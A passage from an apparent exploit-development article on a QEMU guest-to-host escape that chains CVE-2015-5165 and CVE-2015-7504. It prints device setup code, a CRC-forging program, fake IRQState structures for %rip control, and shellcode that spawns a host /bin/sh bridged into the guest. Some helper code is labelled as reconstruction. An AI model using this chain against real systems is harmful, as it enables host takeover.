| +-------+------+------------+--+------+--+---------------+ 0xe0 | CpCmd | ... |RxRingAddrLO|RxRingAddrHI| ... | +-------+------+------------+------------+---------------+ - TxConfig: Enable/disable Tx flags such as TxLoopBack (enable loopback test mode), TxCRC (do not append CRC to Tx Packets), etc. - RxConfig: Enable/disable Rx flags such as AcceptBroadcast (accept broadcast packets), AcceptMulticast (accept multicast packets), etc. - CpCmd: C+ command register used to enable some functions such as CplusRxEnd (enable receive), CplusTxEnd (enable transmit), etc. - TxAddr0: Physical memory address of Tx descriptors table. - RxRingAddrLO: Low 32-bits physical memory address of Rx descriptors table. - RxRingAddrHI: High 32-bits physical memory address of Rx descriptors table. - TxPoll: Tell the card to check Tx descriptors. A Rx/Tx-descriptor is defined by the following structure where buf_lo and buf_hi are low 32 bits and high 32 bits physical memory address of Tx/Rx buffers, respectively. These addresses point to buffers holding packets to be sent/received and must be aligned on page size boundary. The variable dw0 encodes the size of the buffer plus additional flags such as the ownership flag to denote if the buffer is owned by the card or the driver. struct rtl8139_desc { uint32_t dw0; uint32_t dw1; uint32_t buf_lo; uint32_t buf_hi; }; The network card is configured through in*() out*() primitives (from sys/io.h). We need to have CAP_SYS_RAWIO privileges to do so. The following snippet of code configures the card and sets up a single Tx descriptor. #define RTL8139_PORT 0xc000 #define RTL8139_BUFFER_SIZE 1500 struct rtl8139_desc desc; void *rtl8139_tx_buffer; uint32_t phy_mem; rtl8139_tx_buffer = aligned_alloc(PAGE_SIZE, RTL8139_BUFFER_SIZE); phy_mem = (uint32)gva_to_gpa(rtl8139_tx_buffer); memset(&desc, 0, sizeof(struct rtl8139_desc)); desc->dw0 |= CP_TX_OWN | CP_TX_EOR | CP_TX_LS | CP_TX_LGSEN | CP_TX_IPCS | CP_TX_TCPCS; desc->dw0 += RTL8139_BUFFER_SIZE; desc.buf_lo = phy_mem; iopl(3); outl(TxLoopBack, RTL8139_PORT + TxConfig); outl(AcceptMyPhys, RTL8139_PORT + RxConfig); outw(CPlusRxEnb|CPlusTxEnb, RTL8139_PORT + CpCmd); outb(CmdRxEnb|CmdTxEnb, RTL8139_PORT + ChipCmd); outl(phy_mem, RTL8139_PORT + TxAddr0); outl(0x0, RTL8139_PORT + TxAddr0 + 0x4); ----[ 3.3 - Exploit The full exploit (cve-2015-5165.c) is available inside the attached source code tarball. The exploit configures the required registers on the card and sets up Tx and Rx buffer descriptors. Then it forges a malformed IP packet addressed to the MAC address of the card. This enables us to read the leaked data by accessing the configured Rx buffers. While analyzing the leaked data we have observed that several function pointers are present. A closer look reveals that these functions pointers are all members of a same QEMU internal structure: typedef struct ObjectProperty { gchar *name; gchar *type; gchar *description; ObjectPropertyAccessor *get; ObjectPropertyAccessor *set; ObjectPropertyResolve *resolve; ObjectPropertyRelease *release; void *opaque; QTAILQ_ENTRY(ObjectProperty) node; } ObjectProperty; QEMU follows an object model to manage devices, memory regions, etc. At startup, QEMU creates several objects and assigns to them properties. For example, the following call adds a "may-overlap" property to a memory region object. 
This property is endowed with a getter method to retrieve the value of this boolean property: object_property_add_bool(OBJECT(mr), "may-overlap", memory_region_get_may_overlap, NULL, /* memory_region_set_may_overlap */ &error_abort); The RTL8139 network card device emulator reserves a 64 KB on the heap to reassemble packets. There is a large chance that this allocated buffer fits on the space left free by destroyed object properties. In our exploit, we search for known object properties in the leaked memory. More precisely, we are looking for 80 bytes memory chunks (chunk size of a free'd ObjectProperty structure) where at least one of the function pointers is set (get, set, resolve or release). Even if these addresses are subject to ASLR, we can still guess the base address of the .text section. Indeed, their page offsets are fixed (12 least significant bits or virtual addresses are not randomized). We can do some arithmetics to get the address of some of QEMU's useful functions. We can also derive the address of some LibC functions such as mprotect() and system() from their PLT entries. We have also noticed that the address PHY_MEM + 0x78 is leaked several times, where PHY_MEM is the start address of the physical memory allocated for the guest. The current exploit searches the leaked memory and tries to resolves (i) the base address of the .text segment and (ii) the base address of the physical memory. --[ 4 - Heap-based Overflow Exploitation This section discusses the vulnerability CVE-2015-7504 and provides an exploit that gets control over the %rip register. ----[ 4.1 - The vulnerable Code The AMD PCNET network card emulator is vulnerable to a heap-based overflow when large-size packets are received in loopback test mode. The PCNET device emulator reserves a buffer of 4 kB to store packets. If the ADDFCS flag is enabled on Tx descriptor buffer, the card appends a CRC to received packets as shown in the following snippet of code in pcnet_receive() function from hw/net/pcnet.c. This does not pose a problem if the size of the received packets are less than 4096 - 4 bytes. However, if the packet has exactly 4096 bytes, then we can overflow the destination buffer with 4 bytes. uint8_t *src = s->buffer; /* ... 
*/ if (!s->looptest) { memcpy(src, buf, size); /* no need to compute the CRC */ src[size] = 0; src[size + 1] = 0; src[size + 2] = 0; src[size + 3] = 0; size += 4; } else if (s->looptest == PCNET_LOOPTEST_CRC || !CSR_DXMTFCS(s) || size < MIN_BUF_SIZE+4) { uint32_t fcs = ~0; uint8_t *p = src; while (p != &src[size]) CRC(fcs, *p++); *(uint32_t *)p = htonl(fcs); size += 4; } In the above code, s points to PCNET main structure, where we can see that beyond our vulnerable buffer, we can corrupt the value of the irq variable: struct PCNetState_st { NICState *nic; NICConf conf; QEMUTimer *poll_timer; int rap, isr, lnkst; uint32_t rdra, tdra; uint8_t prom[16]; uint16_t csr[128]; uint16_t bcr[32]; int xmit_pos; uint64_t timer; MemoryRegion mmio; uint8_t buffer[4096]; qemu_irq irq; void (*phys_mem_read)(void *dma_opaque, hwaddr addr, uint8_t *buf, int len, int do_bswap); void (*phys_mem_write)(void *dma_opaque, hwaddr addr, uint8_t *buf, int len, int do_bswap); void *dma_opaque; int tx_busy; int looptest; }; The variable irq is a pointer to IRQState structure that represents a handler to execute: typedef void (*qemu_irq_handler)(void *opaque, int n, int level); struct IRQState { Object parent_obj; qemu_irq_handler handler; void *opaque; int n; }; This handler is called several times by the PCNET card emulator. For instance, at the end of pcnet_receive() function, there is call a to pcnet_update_irq() which in turn calls qemu_set_irq(): void qemu_set_irq(qemu_irq irq, int level) { if (!irq) return; irq->handler(irq->opaque, irq->n, level); } So, what we need to exploit this vulnerability: - allocate a fake IRQState structure with a handler to execute (e.g. system()). - compute the precise address of this allocated fake structure. Thanks to the previous memory leak, we know exactly where our fake structure resides in QEMU's process memory (at some offset from the base address of the guest's physical memory). - forge a 4 kB malicious packets. - patch the packet so that the computed CRC on that packet matches the address of our fake IRQState structure. - send the packet. When this packet is received by the PCNET card, it is handled by the pcnet_receive function() that performs the following actions: - copies the content of the received packet into the buffer variable. - computes a CRC and appends it to the buffer. The buffer is overflowed with 4 bytes and the value of irq variable is corrupted. - calls pcnet_update_irq() that in turns calls qemu_set_irq() with the corrupted irq variable. Out handler is then executed. Note that we can get control over the first two parameters of the substituted handler (irq->opaque and irq->n), but thanks to a little trick that we will see later, we can get control over the third parameter too (level parameter). This will be necessary to call mprotect() function. Note also that we corrupt an 8-byte pointer with 4 bytes. This is sufficient in our testing environment to successfully get control over the %rip register. However, this poses a problem with kernels compiled without the CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. This issue is discussed in section 5.4. ----[ 4.2 - Setting up the Card Before going further, we need to set up the PCNET card in order to configure the required flags, set up Tx and Rx descriptor buffers and allocate ring buffers to hold packets to transmit and receive. The AMD PCNET card could be accessed in 16 bits mode or 32 bits mode. This depends on the current value of DWI0 (value stored in the card). 
In the following, we detail the main registers of the PCNET card in 16 bits access mode as this is the default mode after a card reset: 0 16 +----------------------------------+ | EPROM | +----------------------------------+ | RDP - Data reg for CSR | +----------------------------------+ | RAP - Index reg for CSR and BCR | +----------------------------------+ | Reset reg | +----------------------------------+ | BDP - Data reg for BCR | +----------------------------------+ The card can be reset to default by accessing the reset register. The card has two types of internal registers: CSR (Control and Status Register) and BCR (Bus Control Registers). Both registers are accessed by setting first the index of the register that we want to access in the RAP (Register Address Port) register. For instance, if we want to init and restart the card, we need to set bit0 and bit1 to 1 of register CSR0. This can be done by writing 0 to RAP register in order to select the register CSR0, then by setting register CSR to 0x3: outw(0x0, PCNET_PORT + RAP); outw(0x3, PCNET_PORT + RDP); The configuration of the card could be done by filling an initialization structure and passing the physical address of this structure to the card (through register CSR1 and CSR2): struct pcnet_config { uint16_t mode; /* working mode: promiscusous, looptest, etc. */ uint8_t rlen; /* number of rx descriptors in log2 base */ uint8_t tlen; /* number of tx descriptors in log2 base */ uint8_t mac[6]; /* mac address */ uint16_t _reserved; uint8_t ladr[8]; /* logical address filter */ uint32_t rx_desc; /* physical address of rx descriptor buffer */ uint32_t tx_desc; /* physical address of tx descriptor buffer */ }; ----[ 4.3 - Reversing CRC As discussed previously, we need to fill a packet with data in such a way that the computed CRC matches the address of our fake structure. Fortunately, the CRC is reversible. Thanks to the ideas exposed in [6], we can apply a 4-byte patch to our packet so that the computed CRC matches a value of our choice. The source code reverse-crc.c applies a patch to a pre-filled buffer so that the computed CRC is equal to 0xdeadbeef. 
---[ reverse-crc.c ]--- #include <stdio.h> #include <stdint.h> #define CRC(crc, ch) (crc = (crc >> 8) ^ crctab[(crc ^ (ch)) & 0xff]) /* generated using the AUTODIN II polynomial * x^32 + x^26 + x^23 + x^22 + x^16 + * x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + x^1 + 1 */ static const uint32_t crctab[256] = { 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d, }; uint32_t crc_compute(uint8_t *buffer, size_t size) { uint32_t fcs = ~0; uint8_t *p = buffer; while (p != &buffer[size]) CRC(fcs, *p++); return fcs; } uint32_t 
crc_reverse(uint32_t current, uint32_t target)
{
    size_t i = 0, j;
    uint8_t *ptr;
    uint32_t workspace[2] = { current, target };

    for (i = 0; i < 2; i++)
        workspace[i] &= (uint32_t)~0;

    ptr = (uint8_t *)(workspace + 1);

    for (i = 0; i < 4; i++) {
        j = 0;
        while (crctab[j] >> 24 != *(ptr + 3 - i))
            j++;
        *((uint32_t *)(ptr - i)) ^= crctab[j];
        *(ptr - i - 1) ^= j;
    }

    return *(uint32_t *)(ptr - 4);
}

int main()
{
    uint32_t fcs;
    uint32_t buffer[2] = { 0xcafecafe };
    uint8_t *ptr = (uint8_t *)buffer;

    fcs = crc_compute(ptr, 4);
    printf("[+] current crc = %#010x, required crc = %#010x\n",
           fcs, 0xdeadbeef);

    fcs = crc_reverse(fcs, 0xdeadbeef);
    printf("[+] applying patch = %#010x\n", fcs);

    buffer[1] = fcs;
    fcs = crc_compute(ptr, 8);
    if (fcs == 0xdeadbeef)
        printf("[+] crc patched successfully\n");
}

----[ 4.4 - Exploit

The exploit (file cve-2015-7504.c from the attached source code tarball)
resets the card to its default settings, then configures the Tx and Rx
descriptors and sets the required flags, and finally inits and restarts the
card to push our network card config. The rest of the exploit simply
triggers the vulnerability and crashes QEMU with a single packet.

As shown below, qemu_set_irq() is called with a corrupted irq pointer of
0x7f66deadbeef. QEMU crashes as there is no runnable handler at this
address:

    (gdb) shell ps -e | grep qemu
     8335 pts/4    00:00:03 qemu-system-x86
    (gdb) attach 8335
    ...
    (gdb) c
    Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    0x00007f669ce6c363 in qemu_set_irq (irq=0x7f66deadbeef, level=0)
    43          irq->handler(irq->opaque, irq->n, level);

--[ 5 - Putting all Together

In this section, we combine the two previous exploits in order to escape
from the VM and get code execution on the host with QEMU's privileges.

First, we exploit CVE-2015-5165 in order to reconstruct the memory layout
of QEMU. More precisely, the exploit tries to resolve the following
addresses in order to bypass ASLR:

  - The guest physical memory base address. In our exploit, we need to make
    some allocations in the guest and learn their precise addresses within
    the virtual address space of QEMU.

  - The .text section base address. This gives us the address of the
    qemu_set_irq() function.

  - The .plt section base address. This lets us determine the addresses of
    functions such as fork() and execv(), used to build our shellcode. The
    address of mprotect() is also needed to change the permissions of the
    guest physical memory. Remember that the physical memory allocated for
    the guest is not executable.

----[ 5.1 - RIP Control

As shown in section 4, we have control over the %rip register. Instead of
letting QEMU crash at an arbitrary address, we overflow the PCNET buffer
with an address pointing to a fake IRQState that calls a function of our
choice.

At first sight, one could be tempted to build a fake IRQState that runs
system(). However, this call will fail because some of QEMU's memory
mappings are not preserved across a fork() call. More precisely, the
mmapped physical memory is marked with the MADV_DONTFORK flag:

    qemu_madvise(new_block->host, new_block->max_length,
                 QEMU_MADV_DONTFORK);

Calling execv() is not useful either, as we would lose our hands on the
guest machine. Note also that one could construct a shellcode by chaining
several fake IRQState structures in order to call multiple functions, since
qemu_set_irq() is called several times by the PCNET device emulator.
However, we found it more convenient and more reliable to execute a
shellcode after enabling the PROT_EXEC flag on the memory page where the
shellcode is located.
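The effect of MADV_DONTFORK on a would-be system()/fork() payload can be
reproduced outside QEMU with a few lines of C. The program below is our own
standalone illustration (not part of the exploit): the child process loses
the madvise'd mapping and is killed by SIGSEGV when it touches it, which is
exactly why a forked shell cannot see the guest RAM until the flag is
undone.

    #define _GNU_SOURCE
    #include <stdio.h>
    #include <string.h>
    #include <sys/mman.h>
    #include <sys/types.h>
    #include <sys/wait.h>
    #include <unistd.h>

    int main(void)
    {
        size_t len = 4096;

        /* stands in for the guest physical memory mapped by QEMU */
        char *ram = mmap(NULL, len, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (ram == MAP_FAILED) {
            perror("mmap");
            return 1;
        }
        strcpy(ram, "hello from the parent");

        /* the same flag QEMU sets on the guest RAM block */
        if (madvise(ram, len, MADV_DONTFORK) != 0) {
            perror("madvise");
            return 1;
        }

        pid_t pid = fork();
        if (pid == 0) {
            /* the mapping does not exist in the child: this access faults */
            printf("child reads: %s\n", ram);
            return 0;
        }

        int status;
        waitpid(pid, &status, 0);
        if (WIFSIGNALED(status))
            printf("child killed by signal %d (SIGSEGV expected)\n",
                   WTERMSIG(status));
        return 0;
    }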
Our idea is to build two fake IRQState structures. The first one is used to
make a call to mprotect(). The second one is used to call a shellcode that
first undoes the MADV_DONTFORK flag and then runs an interactive shell
between the guest and the host.

As stated earlier, when qemu_set_irq() is called, it takes two parameters
as input: irq (a pointer to an IRQState structure) and level (the IRQ
level), then calls the handler as follows:

    void qemu_set_irq(qemu_irq irq, int level)
    {
        if (!irq)
            return;

        irq->handler(irq->opaque, irq->n, level);
    }

As shown above, we have control only over the first two parameters. So how
do we call mprotect(), which takes three arguments? To overcome this, we
make qemu_set_irq() call itself first with the following parameters:

  - irq: pointer to a fake IRQState whose handler pointer is set to the
    mprotect() function.

  - level: the mprotect flags, set to PROT_READ | PROT_WRITE | PROT_EXEC.

This is achieved by setting up two fake IRQState structures, as shown in
the following code snippet:

    struct IRQState {
        uint8_t  _nothing[44];
        uint64_t handler;
        uint64_t arg_1;
        int32_t  arg_2;
    };

    struct IRQState fake_irq[2];
    hptr_t fake_irq_mem = gva_to_hva(fake_irq);

    /* do qemu_set_irq */
    fake_irq[0].handler = qemu_set_irq_addr;
    fake_irq[0].arg_1   = fake_irq_mem + sizeof(struct IRQState);
    fake_irq[0].arg_2   = PROT_READ | PROT_WRITE | PROT_EXEC;

    /* do mprotect */
    fake_irq[1].handler = mprotect_addr;
    fake_irq[1].arg_1   = (fake_irq_mem >> PAGE_SHIFT) << PAGE_SHIFT;
    fake_irq[1].arg_2   = PAGE_SIZE;

After the overflow takes place, qemu_set_irq() is called with a fake
handler that simply re-enters qemu_set_irq(), which in turn calls
mprotect() after having adjusted the level parameter to 7 (the flags
required by mprotect). The memory is now executable, so we can pass control
to our interactive shell by rewriting the handler of the first IRQState
with the address of our shellcode:

    payload.fake_irq[0].handler = shellcode_addr;
    payload.fake_irq[0].arg_1   = shellcode_data;

----[ 5.2 - Interactive Shell

We could simply write a basic shellcode that binds a shell to netcat on
some port and then connect to that shell from a separate machine. That
would be a satisfactory solution, but we can do better and avoid firewall
restrictions. We can leverage shared memory between the guest and the host
to build a bindshell.

Exploiting QEMU's vulnerabilities is a little subtle here, as the code we
are writing in the guest is already available in QEMU's process memory, so
there is no need to inject a shellcode. Even better, we can share code and
make it run both on the guest and on the attacked host.

The following figure summarizes the shared memory layout and the
processes/threads running on the host and the guest.

We create two shared ring buffers (in and out) and provide read/write
primitives with spin-lock access to those shared memory areas. On the host
machine, we run a shellcode that starts a /bin/sh shell in a separate
process after having first duplicated its stdin and stdout file
descriptors. We also create two threads. The first one reads commands from
the shared memory and passes them to the shell via a pipe. The second
thread reads the output of the shell (from a second pipe) and writes it to
the shared memory.

These two threads are also instantiated on the guest machine: one writes
the user's input commands into the dedicated shared memory area, the other
prints the results read from the second ring buffer to stdout. Note that in
our exploit we have a third thread (and a dedicated shared area) to handle
stderr output.
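A word on gva_to_hva(), used in the 5.1 snippet above: it translates a
guest virtual address into QEMU's host virtual address space, and it is not
reproduced in this excerpt. A plausible sketch, assuming the guest-RAM base
address (phys_base here) leaked during the CVE-2015-5165 stage and the
/proc/self/pagemap interface documented in [5], could look like this
(everything except gva_to_hva and hptr_t is our own naming; the page must
be present, e.g. touched or mlock'd, and reading PFNs requires root inside
the guest on recent kernels):

    #include <fcntl.h>
    #include <stdint.h>
    #include <unistd.h>

    #define PAGE_SHIFT 12
    #define PAGE_SIZE  (1UL << PAGE_SHIFT)

    typedef uint64_t hptr_t;   /* a host virtual address, as in vm-escape.c */

    /* host virtual address of the guest physical RAM, leaked earlier */
    extern hptr_t phys_base;

    /* guest virtual -> guest physical, via /proc/self/pagemap */
    static uint64_t gva_to_gpa(void *addr)
    {
        uint64_t entry, vfn = (uint64_t)addr >> PAGE_SHIFT;
        int fd = open("/proc/self/pagemap", O_RDONLY);

        pread(fd, &entry, sizeof(entry), vfn * sizeof(entry));
        close(fd);

        /* bits 0-54 hold the page frame number when the page is present */
        return ((entry & ((1ULL << 55) - 1)) << PAGE_SHIFT) |
               ((uint64_t)addr & (PAGE_SIZE - 1));
    }

    /* guest virtual -> host virtual: guest RAM is mapped linearly */
    static hptr_t gva_to_hva(void *addr)
    {
        return phys_base + gva_to_gpa(addr);
    }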
GUEST SHARED MEMORY HOST ----- ------------- ---- +------------+ +------------+ | exploit | | QEMU | | (thread) | | (main) | +------------+ +------------+ +------------+ +------------+ | exploit | sm_write() head sm_read() | QEMU | | (thread) |----------+ |--------------| (thread) | +------------+ | V +---------++-+ | xxxxxxxxxxxxxx----+ pipe IN || | x | +---------++-+ | x ring buffer | | shell | tail ------>x (filled with x) ^ | fork proc. | | | +---------++-+ +-------->--------+ pipe OUT || +------------+ +---------++-+ | exploit | sm_read() tail sm_write() | QEMU | | (thread) |----------+ |--------------| (thread) | +------------+ | V +------------+ | xxxxxxxxxxxxxx----+ | x | | x ring buffer | head ------>x (filled with x) ^ | | +-------->--------+ ----[ 5.3 - VM-Escape Exploit In the section, we outline the main structures and functions used in the full exploit (vm-escape.c). The injected payload is defined by the following structure: struct payload { struct IRQState fake_irq[2]; struct shared_data shared_data; uint8_t shellcode[1024]; uint8_t pipe_fd2r[1024]; uint8_t pipe_r2fd[1024]; }; Where fake_irq is a pair of fake IRQState structures responsible to call mprotect() and change the page protection where the payload resides. The structure shared_data is used to pass arguments to the main shellcode: struct shared_data { struct GOT got; uint8_t shell[64]; hptr_t addr; struct shared_io shared_io; volatile int done; }; Where the got structure acts as a Global Offset Table. It contains the address of the main functions to run by the shellcode. The addresses of these functions are resolved from the memory leak. struct GOT { typeof(open) *open; typeof(close) *close; typeof(read) *read; typeof(write) *write; typeof(dup2) *dup2; typeof(pipe) *pipe; typeof(fork) *fork; typeof(execv) *execv; typeof(malloc) *malloc; typeof(madvise) *madvise; typeof(pthread_create) *pthread_create; typeof(pipe_r2fd) *pipe_r2fd; typeof(pipe_fd2r) *pipe_fd2r; }; The main shellcode is defined by the following function: /* main code to run after %rip control */ void shellcode(struct shared_data *shared_data) { pthread_t t_in, t_out, t_err; int in_fds[2], out_fds[2], err_fds[2]; struct brwpipe *in, *out, *err; char *args[2] = { shared_data->shell, NULL }; if (shared_data->done) { return; } shared_data->got.madvise((uint64_t *)shared_data->addr, PHY_RAM, MADV_DOFORK); shared_data->got.pipe(in_fds); shared_data->got.pipe(out_fds); shared_data->got.pipe(err_fds); in = shared_data->got.malloc(sizeof(struct brwpipe)); out = shared_data->got.malloc(sizeof(struct brwpipe)); err = shared_data->got.malloc(sizeof(struct brwpipe)); in->got = &shared_data->got; out->got = &shared_data->got; err->got = &shared_data->got; in->fd = in_fds[1]; out->fd = out_fds[0]; err->fd = err_fds[0]; in->ring = &shared_data->shared_io.in; out->ring = &shared_data->shared_io.out; err->ring = &shared_data->shared_io.err; if (shared_data->got.fork() == 0) { shared_data->got.close(in_fds[1]); shared_data->got.close(out_fds[0]); shared_data->got.close(err_fds[0]); shared_data->got.dup2(in_fds[0], 0); shared_data->got.dup2(out_fds[1], 1); shared_data->got.dup2(err_fds[1], 2); shared_data->got.execv(shared_data->shell, args); } else { shared_data->got.close(in_fds[0]); shared_data->got.close(out_fds[1]); shared_data->got.close(err_fds[1]); shared_data->got.pthread_create(&t_in, NULL, shared_data->got.pipe_r2fd, in); shared_data->got.pthread_create(&t_out, NULL, shared_data->got.pipe_fd2r, out); shared_data->got.pthread_create(&t_err, NULL, 
shared_data->got.pipe_fd2r, err); shared_data->done = 1; } } The shellcode checks first the flag shared_data->done to avoid running the shellcode multiple times (remember that qemu_set_irq used to pass control to the shellcode is called several times by QEMU code). The shellcode calls madvise() with shared_data->addr pointing to the physical memory. This is necessary to undo the MADV_DONTFORK flag and hence preserve memory mappings across fork() calls. The shellcode creates a child process that is responsible to start a shell ("/bin/sh"). The parent process starts threads that make use of shared memory areas to pass shell commands from the guest to the attacked host and then write back the results of these commands to the guest machine. The communication between the parent and the child process is carried by pipes. As shown below, a shared memory area consists of a ring buffer that is accessed by sm_read() and sm_write() primitives: struct shared_ring_buf { volatile bool lock; bool empty; uint8_t head; uint8_t tail; uint8_t buf[SHARED_BUFFER_SIZE]; }; static inline __attribute__((always_inline)) ssize_t sm_read(struct GOT *got, struct shared_ring_buf *ring, char *out, ssize_t len) { ssize_t read = 0, available = 0; do { /* spin lock */ while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED)); if (ring->head > ring->tail) { // loop on ring available = SHARED_BUFFER_SIZE - ring->head; } else { available = ring->tail - ring->head; if (available == 0 && !ring->empty) { available = SHARED_BUFFER_SIZE - ring->head; } } available = MIN(len - read, available); imemcpy(out, ring->buf + ring->head, available); read += available; out += available; ring->head += available; if (ring->head == SHARED_BUFFER_SIZE) ring->head = 0; if (available != 0 && ring->head == ring->tail) ring->empty = true; __atomic_clear(&ring->lock, __ATOMIC_RELAXED); } while (available != 0 || read == 0); return read; } static inline __attribute__((always_inline)) ssize_t sm_write(struct GOT *got, struct shared_ring_buf *ring, char *in, ssize_t len) { ssize_t written = 0, available = 0; do { /* spin lock */ while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED)); if (ring->tail > ring->head) { // loop on ring available = SHARED_BUFFER_SIZE - ring->tail; } else { available = ring->head - ring->tail; if (available == 0 && ring->empty) { available = SHARED_BUFFER_SIZE - ring->tail; } } available = MIN(len - written, available); imemcpy(ring->buf + ring->tail, in, available); written += available; in += available; ring->tail += available; if (ring->tail == SHARED_BUFFER_SIZE) ring->tail = 0; if (available != 0) ring->empty = false; __atomic_clear(&ring->lock, __ATOMIC_RELAXED); } while (written != len); return written; } These primitives are used by the following threads function. The first one reads data from a shared memory area and writes it to a file descriptor. The second one reads data from a file descriptor and writes it to a shared memory area. 
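A small aside before the two thread functions that follow: they operate on
a struct brwpipe handle, and the payload's shared_io member groups the
three rings, but neither type is reproduced in this excerpt of vm-escape.c.
A plausible reconstruction, inferred from how the fields are used above and
below (the field names come from the code, the layout is our guess), would
be:

    struct shared_io {
        struct shared_ring_buf in;    /* guest input -> host shell stdin */
        struct shared_ring_buf out;   /* host shell stdout -> guest terminal */
        struct shared_ring_buf err;   /* host shell stderr -> guest terminal */
    };

    /* one end of a ring<->fd bridge, handed to pipe_r2fd()/pipe_fd2r() */
    struct brwpipe {
        struct GOT *got;               /* resolved libc/pthread entry points */
        int fd;                        /* pipe end connected to /bin/sh */
        struct shared_ring_buf *ring;  /* shared ring to read from/write to */
    };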
